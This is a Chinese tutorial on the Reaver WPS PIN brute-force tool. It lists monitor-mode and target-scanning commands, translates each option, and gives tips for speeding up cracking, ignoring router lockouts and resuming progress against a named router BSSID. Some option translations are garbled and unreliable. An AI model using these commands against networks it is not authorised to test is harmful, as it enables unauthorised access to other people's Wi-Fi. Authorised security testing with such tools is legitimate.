reaver参数详解和死循环解决方法 下载本文

内容发布更新时间 : 2025/10/25 10:43:36星期一 下面是文章的全部内容请认真阅读。

Reaver基本命令参数详解及应用

Reaver基本命令参数 XiaoPanOS下:

选择“终端”输入sudo thunar

这里是为了取得超级权限,选择系统文件-usr-local-ect-reave ifconfig –a //确认你用哪一个网卡WLAN0或WLAN1 airmon-ng start wlan0 //开启监听模式

wash –i mon0 –C //查看开启wps的无线路由器 airodump-ng mon0 //查看周边AP信息(抓包)

reaver –i mon0 –b MAC –a –S –vv –d 3 –t 3 //开始穷举PIN码 reaver –i mon0 –b MAC –a –S –vv –d 0 //加快速度为1秒 reaver –i mon0 –b MAC –a –S –vv –p xxxx //从前4位PIN码开始 reave的进度表文件保存在: 1.3版:/etc/reaver/MAC地址.wpc 1.4版:/usr/local/etc/reaver/MAC地址.wpc CDliunx下:

选择“终端”输入sudo thunar

这里是为了取得超级权限,选择系统文件-usr-local-ect-reaver-

reaver必需的参数:

-i, --interface=wlan Name of the monitor-mode interface to use //监视模式接口使用的名称

-b, --bssid=mac BSSID of the target AP //目标AP的SSID

reaver可选参数:

-m, --mac=mac MAC of the host system //主机系统的MAC -e, --essid=ssid ESSID of the target AP //目标AP的ESSID

-c, --channel=channel Set the 802.11 channel for the interface (implies -f) //设置接口的802.11信道 (意味着 -f)

-o, --out-file=file Send output to a log file [stdout] //输出发送到一个日志文件 -s, --session=file Restore a previous session file //恢复以前的记录文件

-C, --exec=command Execute the supplied command upon successful pin recovery //所提供的命令执行成功后,pin 恢复

-D, --daemonize Daemonize reaver //守护进程 reaver

-a, --auto Auto detect the best advanced options for the target AP //自动检测目标AP的最先进的选项

-f, --fixed Disable channel hopping //禁用信道跳频

-5, --5ghz Use 5GHz 802.11 channels //使用5GHz的802.11信道

-v, --verbose Display non-critical warnings (-vv for more) //显示非关键的警告(- VV更多)

-q, --quiet Only display critical messages //仅显示重要消息 -h, --help Show help //显示帮助

reaver高级选项:

-p, --pin=wps pin Use the specified 4 or 8 digit WPS pin //使用指定的4个或8个的 pin WPS

-d, --delay=seconds Set the delay between pin attempts [1] //设置pin尝试之间的延迟[1] -l, --lock-delay=seconds Set the time to wait if the AP locks WPS pin attempts [60] //设置等待的时间,如果AP锁定WPS PIN尝试[60]

-g, --max-attempts=num Quit after num pin attempts //退出后NUM pin尝试 -x, --fail-wait=seconds Set the time to sleep after 10 unexpected failures [0] //设定时间后进入休眠10[0]意外故障

-r, --recurring-delay=xy Sleep for y seconds every x pin attempts //对每一个pin码尝试Y秒

-t, --timeout=seconds Set the receive timeout period [5] //设置接收超时时间[5] -T, --m57-timeout=seconds Set the M5M7 timeout period [0.20] //设置M5M7超时期[0.20]

-A, --no-associate Do not associate with the AP (association must be done by another application)

//不要与AP关联(协会必须由另一个应用程序进行)

-N, --no-nacks Do not send NACK messages when out of order packets are received //不要发送NACK消息收到时,为了包出

-S, --dh-small Use small DH keys to improve crack speed //使用小DH密钥,以提高PJ速度

-L, --ignore-locks Ignore locked state reported by the target AP //忽略锁定状态的目标AP

-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet //终止每一个EAP失败包WPS的记录

-n, --nack Target AP always sends a NACK [Auto] //目标AP发送一个NACK[自动] -w, --win7 Mimic a Windows 7 registrar [False] //模仿Windows 7的注册处处长[虚假]

reaver 使用方法和技巧: reaver使用方法:

reaver -i mon0 -b xx:xx:xx:xx:xx -a -S -vv -c 频道 -i 监听后接口名称 -b 目标mac地址

-a 自动检测目标AP最佳配置

-S 使用最小的DH key,可以提高PJ速度 -vv 显示更多的非严重警告

-d 即delay每穷举一次的闲置时间预设为1秒 -c 频道

-p PIN码四位或八位 //可以用8位直接找到密码。

当出现有百分数时你就可以用crtl+c来暂停,它会将reaver的进度表文件保存在 1.3版:/etc/reaver/MAC地址.wpc

1.4版:/usr/local/etc/reaver/MAC地址.wpc (tmp/minidwep/MAC地址.wpc)

用资源管理器,手工将以MAC地址命名的、后辍为wpc的文件拷贝到U盘或硬盘中,

下次重启动后,再手工复制到/etc/reaver/ 目录下即可。

注意需要取得ROOT权限,才可将wpc文件复制到/etc/reaver/ 目录下: 在终端模拟里面输入: SUDO SU SUDO THUNAR

reaver使用技巧:

1、将mac地址.wpc 备份后,下次可以继续使用。

2、程序默认每尝试后停止一秒,加入-d0参数使之不停止: reaver -i mon0 -b C8:3A:35:F6:BB:B8 -vv -d0

3、-p参数:-p PIN可以让你在获取到PIN的情况下直接得到路由WPA密码! reaver-i mon0 -b MAC -p PIN 4、wpc结构

0 //这个地方是说它的前4位PIN码的进度位置数,真实位置要+4 0 //这个地方是说后3位PIN数的已经运行测试位置数 0 //0时没有找到,当为1时找到前四位,当为2时全部找到。 下面是1万个前四位数(reaver1.3版4位随机数,1.4版是升序) 第4行起 0000 0001